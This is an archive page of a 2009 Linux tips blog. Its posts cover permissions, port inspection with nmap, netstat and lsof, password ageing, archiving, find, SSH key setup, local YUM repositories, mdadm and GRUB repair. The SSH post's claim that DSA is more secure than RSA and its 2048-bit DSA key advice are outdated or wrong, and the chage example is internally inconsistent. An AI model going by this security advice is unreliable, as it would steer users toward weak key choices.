Tuesday, December 29, 2009

Linux File permissions: Beyond "rwx"

 

The basic:

All the Linux users know about the "rwx" file permissions. These defines if the people who is the owner/ in the same group/ any other people can read/write/execute the file.

However, have you notice some other things in the permission field? Sometimes a "s", sometimes a "t", or "c", "b", "l"... What does this mean? In this article, we'll check out the meanings of all these characters.

First things first, let's make the basic clear. When we do a:

ls -l

in a directory, we get something like this:

drwxr-xr-x 2 dejavu dejavu 512 7 23 14:52 directory

-rw-r--r-- 1 dejavu dejavu 3 7 23 14:52 file

What we are caring about here is the first 10 characters. The first character is "d" if it is a directory, and a "-" if it is a normal file. The following 9 characters can be divided into 3 groups: 2-4, 5-7, 8-10. Which marks the permissions for owner, group, and others, accordingly.

For a file, read, write, and executable is straightforward. For a directory, read and write is easy to understand too. But.... What does "x" for a directory mean? Could we really execute a directory?

What "x" mean for directories

In the Linux file system, everything is a file. The directory is just a special kind of file. And in this "directory" file, there are several blocks, each block holds the information of one file or one sub-directory in it.

Thus we can understand why the r permission is needed to do a ls in a directory: in fact the ls program reads the "directory" file and re-formats it to some human readable text.

And we can understand why we need the w permission to create, delete, or rename a file/sub-directory in a directory: we actually need to write to this "directory" file, to modify the corresponding blocks.

And for x, executable, let's think it as "search, and read part of the file, and then do things accordingly".

Now if we want to enter a directory, say cd to it, we'll need to read part of the "directory" file and do things accordingly. So if we don't have a x permission on a directory, we can't cd into it.

And say if we have an executable file in a directory, if we want to run that file, we first need to make sure the file exists (read the "directory" file), and then do things accordingly(executable permission of the "directory" file)

It might be confusing and you might say: "I'll just make the r and the x appears together". Right. This is indeed most of the cases. However, with the understanding above, we can do something really cool:

First, let's setup our experiment environment:

mkdir directory

cd directory

echo "hello" > file

Now if we do:

ls -l

we'll get something like:

-rw-r--r-- 1 dejavu dejavu 6 7 23 15:40 file

The permission bit mights be slightly different, depending on your umask settings, and the user-name/group-name will be different. Now do a:

cd ..

chmod 300 directory

ls -l

And you'll see:

d-wx------ 2 dejavu dejavu 512 7 23 15:40 directory

We have the executable permission, but not the read permission on this directory. Now if we try to:

cd directory

ls -l

We'll be able to do the cd command, which is decide by the x permission we have, but the ls -l command will fail:

Opening directory: permission denied

This says we don't have the r permission, so we can't read the "directory" file and find out what is in it.

But we know there's a file named "file" in it. So we can do:

cat file

or:

cd ..

cat directory/file

and we'll get what we want: the output as:

hello

Note if you are using some "tab completion" on file and directory names of your shell, you'll find out that they won't work on the name "file". This is because the file/directory name completion need to read what is in the directory, and requires the r permission of the "directory" file, which we don't have here.

The first character

As we said above, Linux treats everything is the file system a file. Most of the time we'll see directory files (with a d as the first character of the permission field) and normal files (with a - as the first character of the permission field).

However if you do a:

ls /dev

You'll find many other characters: c, b, and l, etc.

These are for "special" files in Linux. Both c and b marks device files, which corresponds to a device.

In the Linux world, there are two ways to read/write a file: stream based, and block based. Stream based means we'll need to read or write the file character by character. As for device, this is typically the terminals. And for block based devices, we read/write the file block by block, the block size, 512 bytes, 1024 bytes, will be determined by the device. The most typical device is the disk.

And a l marks a symbolic link file. Think symbolic link file kind of the "file shortcut" on windows. And we'll talk more about this in a later article.

There are also s and p. Where s means a Unix socket, and p means a named pipeline. These are facilities the Linux programs used to to IPC - Inter Process Communication. Most of the time the programs will create and delete these files automatically, and you don't need to worry about them.

Setuid setgid and sticky bits:

I have already discussed about these three in my previous posts..

You can refer the below links:

http://basicslinux.blogspot.com/2009/09/sticky-bit.html
http://basicslinux.blogspot.com/2009/09/special-permissions-within-red-hat.html

Friday, December 25, 2009

MERRY CHRISTMAS to all Linux Lovers

 “Some people have told me they don't think a fat penguin really embodies the grace of Linux, which just tells me they have never seen a angry penguin charging at them in excess of 100 mph. They'd be a lot more careful about what they say if they had.”

                         -- Linus Torvalds

 

duke-holiday-2006-1

  adni18_Linux_Christmas_640

christmas-tree-penguins

 linux christmas

HappyHolidays

Thursday, December 24, 2009

Linux Kernel Diagram

 

Linux_kernel_diagram

Reading compressed Files

 

I did not know this, but if you need to show a compressed text file on the screen, you do not actually need to uncompress it.

You can use zcat to send the file to the standard output, uncompressed, but the original file remains untouched.

The syntax of the command is:

zcat file.gz

or you can also use,

gunzip -c file.gz

what is going to happen is that the file will be uncompressed on the fly, sent to the standard output (usually screen).

If the .gz file contains more than one file they will be shown in sequence, you can also redirect the output using >.

Wednesday, December 23, 2009

Trash can or Recycle bin in Linux Desktop (managed from console)

 

Linux Desktops, at least Gnome and KDE has a trash can, where your deleted files go, (only when deleted from a Desktop utility).

Now if you want to manage it from the console, you can, first we need to know that the trash can is only another folder in the File system structure and it is located at:

$HOME/.Trash

So you can send files to Trash just moving them to there, as an example, lets suppose you have a file in your home called example.txt and want to move it to the trash can.

mv $HOME/example.txt $HOME/.Trash/

Whenever you may want to recover it, just move it to its original location or to any other you prefer, just like this:

mv $HOME/.Trash/example.txt $HOME/

and you are done, if you want to purge your trash can, just enter.

rm -rf $HOME/.Trash/*

BE AWARE: This action can not be undone!!, so use with care

you can even create a script to use instead of rm in your console, the easiest one is this:

#!/bin/sh

mv $1 ~/.Trash

If somebody can think into a better one, please share with us, hope you may find this info useful.

How to find which service is listening on a given port?

 

It is really important to know which ports are open in your PC, this is not only useful for Linux, but also for other operating systems, Linux has a lot of tools to check which ports are open, the most common is nmap which is a command line tool, but also exist a Graphical frontEnd for it if you prefer that way.

So to scan you own PC and find open ports you can enter:

sudo nmap -T Aggressive -A -v 127.0.0.1 -p 1-65000

That will scan all ports and you will an output like this:

Starting Nmap 4.53 ( http://insecure.org ) at 2009-12-10 10:20 BOT

Initiating SYN Stealth Scan at 10:20

Scanning localhost (127.0.0.1) [65000 ports]

Discovered open port 113/tcp on 127.0.0.1

Discovered open port 22/tcp on 127.0.0.1

Discovered open port 80/tcp on 127.0.0.1

Discovered open port 443/tcp on 127.0.0.1

Discovered open port 902/tcp on 127.0.0.1

Discovered open port 55378/tcp on 127.0.0.1

Discovered open port 3143/tcp on 127.0.0.1

Discovered open port 8307/tcp on 127.0.0.1

Discovered open port 631/tcp on 127.0.0.1

Discovered open port 8222/tcp on 127.0.0.1

Discovered open port 8308/tcp on 127.0.0.1

Discovered open port 8009/tcp on 127.0.0.1

Discovered open port 111/tcp on 127.0.0.1

Discovered open port 8005/tcp on 127.0.0.1

Discovered open port 8123/tcp on 127.0.0.1

Discovered open port 38599/tcp on 127.0.0.1

Completed SYN Stealth Scan at 10:20, 1.47s elapsed (65000 total ports)

Initiating Service scan at 10:20

Scanning 16 services on localhost (127.0.0.1)

Completed Service scan at 10:21, 88.68s elapsed (16 services on 1 host)

Initiating OS detection (try #1) against localhost (127.0.0.1)

Initiating RPCGrind Scan against localhost (127.0.0.1) at 10:21

Completed RPCGrind Scan against localhost (127.0.0.1) at 10:21, 0.12s elapsed (3 ports)

SCRIPT ENGINE: Initiating script scanning.

SCRIPT ENGINE: rpcinfo.nse is not a file.

SCRIPT ENGINE: Aborting script scan.

Host localhost (127.0.0.1) appears to be up ... good.

Interesting ports on localhost (127.0.0.1):

Not shown: 64984 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 9 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Debian))

111/tcp open rpcbind 2 (rpc #100000)

113/tcp open ident

443/tcp open https?

631/tcp open ipp CUPS 1.2

902/tcp open ssl/vmware-auth VMware GSX Authentication Daemon 1.10 (Uses VNC, SOAP)

3143/tcp open unknown

8005/tcp open unknown

8009/tcp open ajp13?

8123/tcp open http-proxy Polipo http proxy

8222/tcp open unknown

8307/tcp open unknown

8308/tcp open http Apache Tomcat/Coyote JSP engine 1.1

38599/tcp open status 1 (rpc #100024)

55378/tcp open nlockmgr 1-4 (rpc #100021)

As you can see, it tries to guess which service is listening on each port, but it can make mistakes, so if you want to be sure you need to use some other tools, we will see three different now.

Netstat

With netstat the command you need to enter is:

sudo netstat --tcp --udp --listening --program

The output could be something like this:

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 *:902 *:* LISTEN 3441/inetd

tcp 0 0 *:38599 *:* LISTEN 2926/rpc.statd

tcp 0 0 *:3143 *:* LISTEN 2763/perl

tcp 0 0 *:sunrpc *:* LISTEN 2919/portmap

tcp 0 0 *:auth *:* LISTEN 3441/inetd

tcp 0 0 *:55378 *:* LISTEN -

tcp 0 0 *:8307 *:* LISTEN 4096/vmware-hostd

tcp 0 0 localhost:ipp *:* LISTEN 3407/cupsd

tcp 0 0 *:https *:* LISTEN 4096/vmware-hostd

tcp 0 0 *:8123 *:* LISTEN 3455/polipo

tcp 0 0 *:8222 *:* LISTEN 4096/vmware-hostd

tcp6 0 0 localhost:8005 [::]:* LISTEN 3956/webAccess

tcp6 0 0 [::]:8009 [::]:* LISTEN 3956/webAccess

tcp6 0 0 [::]:www [::]:* LISTEN 4175/apache2

tcp6 0 0 [::]:8308 [::]:* LISTEN 3956/webAccess

tcp6 0 0 [::]:ssh [::]:* LISTEN 3281/sshd

udp 0 0 *:44807 *:* 2926/rpc.statd

udp 0 0 *:36555 *:* 3467/avahi-daemon:

udp 0 0 *:982 *:* 2926/rpc.statd

udp 0 0 *:mdns *:* 3467/avahi-daemon:

udp 0 0 *:sunrpc *:* 2919/portmap

udp 0 0 *:ipp *:* 3407/cupsd

udp6 0 0 [::]:51107 [::]:* 3467/avahi-daemon:

udp6 0 0 [::]:mdns [::]:* 3467/avahi-daemon:

Now you can see which programs are opening/listening on those ports.

lsof

With this command you need to enter

sudo lsof +M -i4

You will get an output like this:

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

apt-cache 2763 www-data 3u IPv4 6403 TCP *:3143 (LISTEN)

portmap 2919 daemon 3u IPv4 6686 UDP *:sunrpc[portmapper]

portmap 2919 daemon 4u IPv4 6687 TCP *:sunrpc[portmapper] (LISTEN)

rpc.statd 2926 statd 5u IPv4 6726 UDP *:982

rpc.statd 2926 statd 7u IPv4 6736 UDP *:44807[status]

rpc.statd 2926 statd 8u IPv4 6741 TCP *:38599[status] (LISTEN)

cupsd 3407 root 0u IPv4 20058 TCP localhost:ipp (LISTEN)

cupsd 3407 root 3u IPv4 20061 UDP *:ipp

inetd 3441 root 4u IPv4 7612 TCP *:auth (LISTEN)

inetd 3441 root 5u IPv4 7615 TCP *:902 (LISTEN)

polipo 3455 proxy 0u IPv4 7649 TCP *:8123 (LISTEN)

polipo 3455 proxy 2u IPv4 11350 UDP debian.go2linux.org:59528->vnsc-bak.sys.gtei.net:domain

polipo 3455 proxy 5u IPv4 21863 TCP localhost:8123->localhost:56811 (ESTABLISHED)

polipo 3455 proxy 8u IPv4 21405 TCP localhost:8123->localhost:50403 (ESTABLISHED)

polipo 3455 proxy 22u IPv4 21872 TCP localhost:8123->localhost:56813 (ESTABLISHED)

polipo 3455 proxy 42u IPv4 21965 TCP localhost:8123->localhost:56828 (ESTABLISHED)

avahi-dae 3467 avahi 14u IPv4 7702 UDP *:mdns

avahi-dae 3467 avahi 16u IPv4 7704 UDP *:36555

vmware-ho 4096 root 6u IPv4 9022 TCP *:https (LISTEN)

vmware-ho 4096 root 7u IPv4 9023 TCP *:8222 (LISTEN)

vmware-ho 4096 root 30u IPv4 9455 TCP *:8307 (LISTEN)

firefox-b 4431 dejavu 58u IPv4 21862 TCP localhost:56811->localhost:8123 (ESTABLISHED)

firefox-b 4431 dejavu 61u IPv4 21871 TCP localhost:56813->localhost:8123 (ESTABLISHED)

firefox-b 4431 dejavu 62u IPv4 21964 TCP localhost:56828->localhost:8123 (ESTABLISHED)

firefox-b 4431 dejavu 68u IPv4 21404 TCP localhost:50403->localhost:8123 (ESTABLISHED)

Now you have the program running, as an example, netstat showed on 3143 (Perl) but lsoft showed (apt-cacher), which is a perl script.

fuser

Fuser, does help, but is not like those other tools, with fuser you can also kill the process which is listening on a given port.

sudo fuser -v 3143/tcp

The output is:

USER PID ACCESS COMMAND

3143/tcp: www-data 2763 F.... apt-cacher

If you need to kill the process enter

sudo fuser -vk 3143/tcp

Do not forget to read the man pages of this tools to have more info about its uses.

Tuesday, December 22, 2009

Force your users to change their passwords frequently

 

The users of a Linux Operating system computer, should always take care about security and if you are the admin of a Linux box with lots of users, you are responsible for the security of it, and maybe you should "force" the other users to change their passwords from time to time, to make this use the command chage

Apply this to a user, lets say johnny

sudo chage --list johnny

something like this may appear.

$sudo chage --list johnny

Last password change : Dec 10, 2009

Password expires : never

Password inactive : never

Account expires : never

Minimum number of days between password change : 0

Maximum number of days between password change : 99999

Number of days of warning before password expires : 7

Now lets change change its expiry password date.

sudo chage -M 30 johnny

This will make its password to expire after 30 days of the last change date.

See now the new info:

$ sudo chage --list johnny

Last password change : Dec 10, 2009

Password expires : never

Password inactive : never

Account expires : never

Minimum number of days between password change : 0

Maximum number of days between password change : 30

Number of days of warning before password expires : 7

Now when I try to login as johnny, this is what I got:

$ su - johnny

Password:

You are required to change your password immediately (password aged)

Changing password for johnny.

(current) UNIX password:

Enter new UNIX password:

Retype new UNIX password:

Password unchanged

Enter new UNIX password:

Retype new UNIX password:

I tried to use the same password again the Linux refused to let me use it, so I was forced to pick a new password.

It is good to have the warn days to 3 or more days, so the user may have time to think a new good password, otherwise will use the first thing he/she may read around resulting in a weak password, which is worse that not changing the original one.

To set the warn days use this command.

sudo chage -W 4 johnny

Now lets check the info for user johnny

$ sudo chage --list johnny

Last password change : Nov 11, 2009

Password expires : Dec 10, 2009

Password inactive : never

Account expires : never

Minimum number of days between password change : 0

Maximum number of days between password change : 30

Number of days of warning before password expires : 4

Now you may see the new expiry date is Dec 10, 2009and he will have a 4 days warning about the expiry of his password.

Monday, December 21, 2009

[CRTL+R] Search in your last used commands

 

This is a Linux shortcut, it is very usable, and with it you will be able to search in your history of commands, by just starting to write the command, it is something like Firefox works, when you start typing an address, and it try to guess where you are trying to go.

Here is how it works.

At the command line press [CRTL+R], you will get something like this:

(reverse-i-search)`':

There you can start typing your command, and the shell will try guess your command based on your history of them.

something like this:

(reverse-i-search)`histor': history|awk '{print $2}'|awk 'BEGIN {FS="|"} {print $1}'|sort|uniq -c|sort

As you might see, I have only typed histor and the shell in reverse order have found the last command that started with that string.

Sunday, December 20, 2009

cpio - copy files to and from archives

 

cpio is a tool to copy files from one place to another, and to create archives, (like tar), or extract files from an archive file.

The good thing is that cpio takes its input from other commands like ls, or find

So you can archive all .mp3 in your home directory by entering this command:

ls *.mp3 | cpio -o --format=tar -F mymp3.tar

Or if you want to include subfolders

find $HOME -name "*.mp3" | cpio -o --format=tar -F mymp3.tar

You can list the contents of a .tar file.

cpio -it -F mymp3.tar

And extract them:

cpio -i -F mymp3.tar

Run

info cpio for a complete tutorial.

Saturday, December 19, 2009

List the files in a tar, tar.gz, tar.bz2 files

 

Today I needed to list some files in a .tar.gz files, and after checking the man page of the tar command, I decided to write this post for any one who may be asking. How to read the contents of a tar file?

Here is how.

tar -tf file.tar

This will list on the screen all files on the archive file.tar, you may want to use less, to page the output.

tar -tf file.tar | less

To list the files if the .tar file is gzipped.

tar -ztf file.tar.gz

or

tar -ztf file.tar.gz | less

To list the files if the .tar file is bzipped.

tar -jtf file.tar.bz2

or

tar -jtf file.tar.bz2 | less

You can also use grep to find a specific file in the archive.

Friday, December 18, 2009

Creating zip files on Linux compatible with Windows

 

I you use Linux Operating System in ur PC and want to send any zip files to ur friends using windows then u cannot use tar.gz files, so u have to use zip to compress those files.

First install it.

sudo aptitude install zip

That works for both Debian and Ubuntu for fedora or redhat download the rpm and install it using rpm command.

Then use it.

zip -r zipped_file.zip /tmp/something/

And it is done, as easy as that, and now all my colleagues will be able to read the zip file.

Thursday, December 17, 2009

Ten useful uses of command ‘find’

 

These are 10 useful uses of the command find in Linux, they are not the most useful, just some useful for me, I will use $HOME as the path for every example but you may use any other.

1. Find empty directories

find $HOME -depth -type d -empty

This will find empty directories in your home directory.

2. Find empty files

find $HOME -depth -type f -empty

This will find empty common files in your home directory.

3. Find a file with a specific name

find $HOME -name [name_of_file]

This will find files with a given name in any child directory of your home.

4. Find a file with a specific extension

find $HOME -name "*.[given_extension]"

This find files wit the given extension all along your home, an example to find jpg files is:

find $HOME -name '*.jpg'

5. Find files with specific permissions

find $HOME -perm [permission bits]

This will find files with the given permission bits in your home, as an example we can look for .txt files that can have 644 bits on.

find $HOME -name '*.txt' -perm 644

6. Find files with some given permissions and no matter the rest

find $HOME -perm -[permision_bits]

This will find files in your home that have match with the given permissions but that can also have some others, as an example:

find $HOME -name '*.txt' -perm -644

This will find the files with 644 but also some with 664 or 777 or anything "greater" than 644.

Output comparison

Let's see some output comparison for this to be better understood.

find $HOME -name '*.txt' -perm 644 -exec ls -l {} \;

-rw-r--r-- 1 root root 181 2007-10-09 23:27 /home/dejavu/lmsensors.txt

-rw-r--r-- 1 dejavu dejavu 2757 2007-08-29 23:52 /home/dejavu/mv.txt

-rw-r--r-- 1 dejavu dejavu 77431 2007-09-05 23:11 /home/dejavu/curl.txt

find $HOME -name '*.txt' -perm -644 -exec ls -l {} \;

-rw-r--r-- 1 root root 181 2007-10-09 23:27 /home/dejavu/lmsensors.txt

-rw-r--r-- 1 dejavu dejavu 2757 2007-08-29 23:52 /home/dejavu/mv.txt

-rw-r--r-- 1 dejavu dejavu 77431 2007-09-05 23:11 /home/dejavu/curl.txt

-rw-rw-r-- 1 dejavu dejavu 464 2007-09-06 01:23 /home/dejavu/post.txt

As you may see in the first example we do not have the file post as it has 664 permissions, so do not exactly match 644, but on the second output, it is listed as it has "greater" permissions than 644

.

7. Find files of given sizes

find -size n[cwbkMG]

This will output the files of a given block size, as an example we can see:

find $HOME -name '*.txt' -size 4k -exec ls -l {} \;

And the output is:

-rw-r--r-- 1 dejavu dejavu 3707 2007-07-25 15:48

/home/dejavu/drupal/public_html/sites/all/modules/akismet/README.txt

-rw-r--r-- 1 dejavu dejavu 4043 2007-01-22 15:44 /home/dejavu/Desktop/front/README.txt

-rw-r--r-- 1 dejavu dejavu 3112 2007-09-23 15:39

/home/dejavu/Desktop/borrar/upgrading-drupal/public_html/sites/all/modules/adsense/README.txt

-rw-r--r-- 1 dejavu dejavu 3707 2007-09-23 15:39

/home/dejavu/Desktop/borrar/upgrading-drupal/public_html/sites/all/modules/akismet/README.txt

-rw-r--r-- 1 dejavu dejavu 3616 2007-09-23 15:39

/home/dejavu/Desktop/borrar/centos-asterisk/how-to-install.txt

Now let's see this other:

find $HOME -name '*.txt' -size 5k -exec ls -l {} \;

And the output is:

-rw-r--r-- 1 dejavu dejavu 4496 2007-09-23 15:39

/home/dejavu/Desktop/borrar/upgrading-drupal/public_html/sites/all/modules/captcha/captcha_api.txt

Now if you divide each file size by 1024 (1k) you will see that the first output is always lower than 4096 (4k) and upper 3072 (3k), on the second output you have it between 4096 (4k) and 5120 (5k)

8. Find files with a give name and any extension

find -name '[given_name].*'

This will output the files of any given name but with any extension

9. Find files modified in the latest blocks of 24 hours

find -mtime n

Where n is:

0 for the last 24 hours

1 for the last 48 hours

2 for the last 72 hours

and so on.

10. Find files that was accessed in the latests blocks of 24 hours

find -atime n

Where n is:

0 for the last 24 hours

1 for the last 48 hours

2 for the last 72 hours

and so on.

I have been using in the examples the -exec parameter, this is used to execute any action over the find files, I was listing them but you may delete them or move them or copy them anything you want.

Wednesday, December 16, 2009

How to add a directory to the path?

 

Sometimes you may need to add a directory to the Linux PATH, and the reason to do this, could be to have some scripts you may have written included in the execution PATH.

This is done easily by with a single command line, but that is going to last only until you reboot the machine or, if logout and loggin again, so If you want to make it permanent, you may need to edit some config files, there is one global, and there are also specific ones for each user, you may choose which according to your needs.

Add a directory to the PATH only for this session

To do this, just run this command from the shell.

export PATH=$PATH:/new/directory

Or

export PATH=/new/directory:$PATH

Add a directory to the PATH of your user only

Just add one of the above commands to the .bash_profile file, if you are using bash, you will have to choose the appropriate one if you are using another shell, you may also add these two lines instead of the above one

PATH=$PATH:/new/directory

export PATH

Add a directory to the PATH globally

To do this, you will have to edit the /etc/profile file, (you will have to be root to do that), and find this line.

PATH="/bin:/usr/bin:/sbin:/usr/sbin:/usr/share/bin"

And add your directory there.

Tuesday, December 15, 2009

How to mount an ISO image in Linux ?

 

According to Wikipedia:

An ISO image is an archive file (also known as a disk image) of an optical disc in a format defined by the International Organization for Standardization (ISO). This format is supported by many software vendors. ISO image files typically have a file extension of .ISO but Mac OS X ISO images often have the extension .CDR. The name ISO is taken from the ISO 9660 file system used with CD-ROM media, but an ISO image can also contain UDF file system because UDF is backward-compatible with ISO 9660.

And if you have one of those images, you can use it under Linux in two ways.

1. Burning an ISO image

http://iso.snoekonline.com/iso.htm

2. Mount the image itself to use if from the disk.

Here we will see how to do the second one.

Create the mount point

sudo mkdir /mnt/iso_image

Mount the ISO image in the mounting point

sudo mount iso_image.iso /mnt/iso_image/ -t iso9660 -o ro,loop=/dev/loop0

or

sudo mount -o loop iso_image.iso /mnt/iso_image

It is good to define it as read only ro as that is the way CDs work

Monday, December 14, 2009

How to Use SSH ?

 

Secure Shell, ssh, is the modern, reasonably secure, method of remotely connecting to another computer. The previous standard, telnet, transmits passwords in clear text and is therefore easy for snoopers to see. Even if you're not concerned about your own account, there have been numerous exploits that give an attacker root(Administrative) access to a computer once they have a successful user-level login; from there they "own" the

computers and can use them, for example, as "sleeper cells" to run denial-of-service attacks, flooding networks with useless traffic. So use ssh whenever possible, for the well-being of the entire Internet.

New users of Linux often find the language used to describe different folders, computers etc, very confusing.

This was the case when I first read this article. Therefore I decided to make this a little simpler for the new user.

To do this we will assign the following scenario to using ssh.

Mary has a laptop machine she is the sole user of. Her username is mary and she has called her computer "laptop" her address is shown as mary@laptop in the terminal (bash)

Bob has a desktop computer he has called it "desktop" and his user name is "bob" therefore his address is shown as bob@desktop when he is in a terminal.

We will use this format to understand how to set up ssh. We will use Mary as the example. She wants to be able to send files to Bob's machine, backup her directories to a central backup file they both share etc.

Steps

  1. Installing ssh: it comes installed by default on all Linux distributions, and on all modern Macintosh computers.
  2. Windows users can get it by running the base install of Cygwin, or simply downloading Putty.
  3. The following steps assume Unix (Linux, Mac OS/X) or Cygwin syntax, however.

3) The simplest, though not the best, way is to simply use it as you would telnet; this

encrypts the traffic using system defaults:

$ ssh me@remote.my

In all these examples, me is your username on the remote computer, and remote.my is the computer to which you are connecting. So for Mary her username is 'mary and she wants to connect to Bob's computer (the remote one) so bob will first set her up as a user on his machine.

Mary would then type from the prompt $ ssh mary@desktop.

She will be prompted for her password once she is connected to Bob's machine. If Mary's username on the local system (the laptop) is the same as that on the remote (the desktop), she can leave off the username altogether:

$ ssh desktop

4) A better way is to use shared keys.

* First generate your key using ssh-keygen:

$ ssh-keygen -t dsa -b 2048

2048 bits is rather paranoid, but doesn't result in noticeable delays on most machines; or you can use the more common 1024. DSA is more secure than RSA.

* Then when you first connect to the remote system, you'll see a dialogue something like this:

jcomeau@ns003:~$ ssh tty.freeshell.org

The authenticity of host 'tty.freeshell.org (192.168.73.1)' can't be established.

RSA key fingerprint is 53:2b:ba:92:a7:88:ca:c1:ff:c2:1c:d1:53:11:fc:4e.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added 'tty.freeshell.org,192.168.73.1' (RSA) to the list of known hosts.

jcomeau@tty.freeshell.org's password:

Last login: Mon Jan 7 19:33:21 2008 from 189.130.14.207

$

* On the remote system (Bob's desktop), Mary must make sure there is a hidden ssh directory and

authorization key file:

$ mkdir -m700 .ssh

$ touch .ssh/authorized_keys

$ chmod 600 .ssh/authorized_keys

If the directory already exists, an error message to that effect will appear, it can safely be ignored. Now

log out, usually with the key sequence ctrl-D.

* Copy your public key to the remote machine: (from laptop to desktop) these are the commands Mary will

type on the laptop:

$ cat .ssh/id_dsa.pub | ssh mary@desktop "cat >> .ssh/authorized_keys"

Pay careful attention to the "punctuation"! The right angle-brackets must be double as shown, or you'll

wipe out any keys you already have; and the quotes must be as shown, or you won't get the desired result.

* Now when Mary ssh's to 'desktop', she won't be asked for a password at all! The protocol takes care of

the authentication, using her public key on the remote (Bob's desktop), and the private key on the local computer (Mary's laptop).

5) Multiple users can be set up on a central machine with each being able to connect securely using ssh and if combined with Rysnc can create very efficient methods of backing up and transferring files safely, quickly and securely

Creating YUM local repository

 

Sometimes, especially when you create your own RPMs, it is extremely useful to keep them in a local YUM repository. The advantage of this is that, when you install a package, YUM automatically resolves any dependencies, not only by downloading the necessary packages from the other repositories you might have in you list, but also by using your local repo as a resource for potential dependencies.

So, when installing a package (eg my_package.rpm) with YUM, you are supposed to have already created RPM packages for all of the my_package.rpm’s dependencies and to have updated the repository’s metadata, so that yum is able to resolve all the dependencies. If these dependencies do not exist in any of the repositories in your list, then, in short, you cannot install your package with yum.

So, in order to install an RPM package and all the other packages that it depends on, you only need to run:

# yum install my_package.rpm

How to create a local YUM repo

You will need an utility, named createrepo. Its RPM package exists in Fedora Extras. To install it, just run as root:

# yum install createrepo

Then, put all your custom RPM packages in a directory. Assuming that this directory is /mnt/My_local_repo/, you can create all the necessary metadata for your local repository by running the following command as root or as the user that owns the directory:

# createrepo /mnt/My_local_repo/

That’s it! Your local YUM repository is ready.

Keep in mind that every time you put any new RPMs in that directory or remove any old RPMs, you will need to run the above command again, so that the repository metadata gets updated.

Add your local repo to the list

The next thing you need to do is to add your local repository to your list of repos, so that yum knows where to find it. This info is kept in the /etc/yum.repos.d/ directory. As root, create a new text file in this directory, name it fedora-local.repo (you can use any name you like, but remember to add the extension .repo), and add the following info in it:

[localrepo]

name=Fedora Core $releasever - My Local Repo

baseurl=file:///mnt/My_local_repo/

enabled=1

gpgcheck=0

#gpgkey=file:///path/to/you/RPM-GPG-KEY

As you can see, we used the protocol file:/// in the baseurl option. This assumes that the local repo exists in the local machine. If it exists in another machine of your internal network, feel free to use any other protocol in order to tell yum where to find your local repository, For example you can use http://, ftp://, smb:// etc.

In the above example, the GPG key check is disabled (gpgcheck=0). If you sign your packages, you can set this to "1" and uncomment the following line (gpgkey=...). This contains the path to your public key, so that YUM can verify the package signatures.

You can have as many local YUM repositories as you like.

Other uses of a local repository

Using a local repository does not only serve as a place for your custom RPMs. You can perfectly save some bandwidth by downloading all the released fedora updates in that repo and use this to update all the systems of your internal network. This will save bandwidth and time.

Sunday, December 13, 2009

Mdadm

Mdadm is the modern tool most Linux distributions use these days to manage software RAID arrays; in the past raid tools was the tool we have used for this. This post will show the most common usages of mdadm to manage software raid arrays; it assumes you have a good understanding of software RAID and Linux in general, and it will just explain the commands line usage of mdadm. The examples bellow use RAID1, but they can be adapted for any RAID level the Linux kernel driver supports.

1. Create a new RAID array

Create (mdadm –create) is used to create a new array:

mdadm --create --verbose /dev/md0 --level=1 /dev/sda1 /dev/sdb2

or using the compact notation:

mdadm -Cv /dev/md0 -l1 -n2 /dev/sd[ab]1

2. /etc/mdadm.conf

/etc/mdadm.conf or /etc/mdadm/mdadm.conf (on debian) is the main configuration file for mdadm. After we create our RAID arrays we add them to this file using:

mdadm --detail --scan >> /etc/mdadm.conf

or on debian

mdadm --detail --scan >> /etc/mdadm/mdadm.conf

3. Remove a disk from an array

We can’t remove a disk directly from the array, unless it is failed, so we first have to fail it (if the drive it is failed this is normally already in failed state and this step is not needed):

mdadm --fail /dev/md0 /dev/sda1

and now we can remove it:

mdadm --remove /dev/md0 /dev/sda1

This can be done in a single step using:

mdadm /dev/md0 --fail /dev/sda1 --remove /dev/sda1

4. Add a disk to an existing array

We can add a new disk to an array (replacing a failed one probably):

mdadm --add /dev/md0 /dev/sdb1

5. Verifying the status of the RAID arrays

We can check the status of the arrays on the system with:

cat /proc/mdstat

or

mdadm --detail /dev/md0

The output of this command will look like:

cat /proc/mdstat

Personalities : [raid1]

md0 : active raid1 sdb1[1] sda1[0]

104320 blocks [2/2] [UU]

md1 : active raid1 sdb3[1] sda3[0]

19542976 blocks [2/2] [UU]

md2 : active raid1 sdb4[1] sda4[0]

223504192 blocks [2/2] [UU]

here we can see both drives are used and working fine – U. A failed drive will show as F, while a degraded array will miss the second disk -

Note: while monitoring the status of a RAID rebuild operation using watch can be useful:

watch cat /proc/mdstat

6. Stop and delete a RAID array

If we want to completely remove a raid array we have to stop if first and then remove it:

mdadm --stop /dev/md0

mdadm --remove /dev/md0

and finally we can even delete the superblock from the individual drives:

mdadm --zero-superblock /dev/sda

Finally in using RAID1 arrays, where we create identical partitions on both drives this can be useful to copy the partitions from sda to sdb:

sfdisk -d /dev/sda | sfdisk /dev/sdb

(this will dump the partition table of sda, removing completely the existing partitions on sdb, so be sure you want this before running this command, as it will not warn you at all).

There are many other usages of mdadm particular for each type of RAID level, and I would recommend to use the manual page (man mdadm) or the help (mdadm –help) if you need more details on its usage. Hopefully these quick examples will put you on the fast track with how mdadm works.

GRUB repair tips

 

One of the most common problems when you have a dual boot option is a dreaded Grub error message at boot up...this can happen for instance if you resize a partition using programs like Gparted in linux...thing is you cannot resize your linux partition if your using it...so to do this you have to "Boot to the Live" distro to make changes to existing partitions.

So ok we resized or deleted partition and allocated free space to expand your drive...now in some cases like mine recently i had one of my systems duel boot with XP pro / Ubuntu 8.10

i decided to delete the XP pro and resize my linux...then i hit on a problem at boot up

i got the dreaded Grub loading error 22 message and could not boot to any OS on the system...so had to manually repair the grub boot loader...here is what i did and it might help others if you have the same problem:

This is not new and a well documented linux procedure I’m just doing it here in case if anyone might have/had the same problem like i did.

ok lets begin:

1)Boot from a live distro ie Ubuntu

2)Open a console

3)type in: sudo grub

4)type in: root (hd and hit the TAB button

this will then show you what physical drives you have and return usually as

root (hd0, or hd1,

hit the TAB again and it will list possible partitions similar to this

grub> root (hd0,

Possible partitions are:

Partition num: 0, Filesystem type unknown, partition type 0�7

Partition num: 2, Filesystem type is ext2fs, partition type 0�83

Partition num: 4, Filesystem type unknown, partition type 0�7

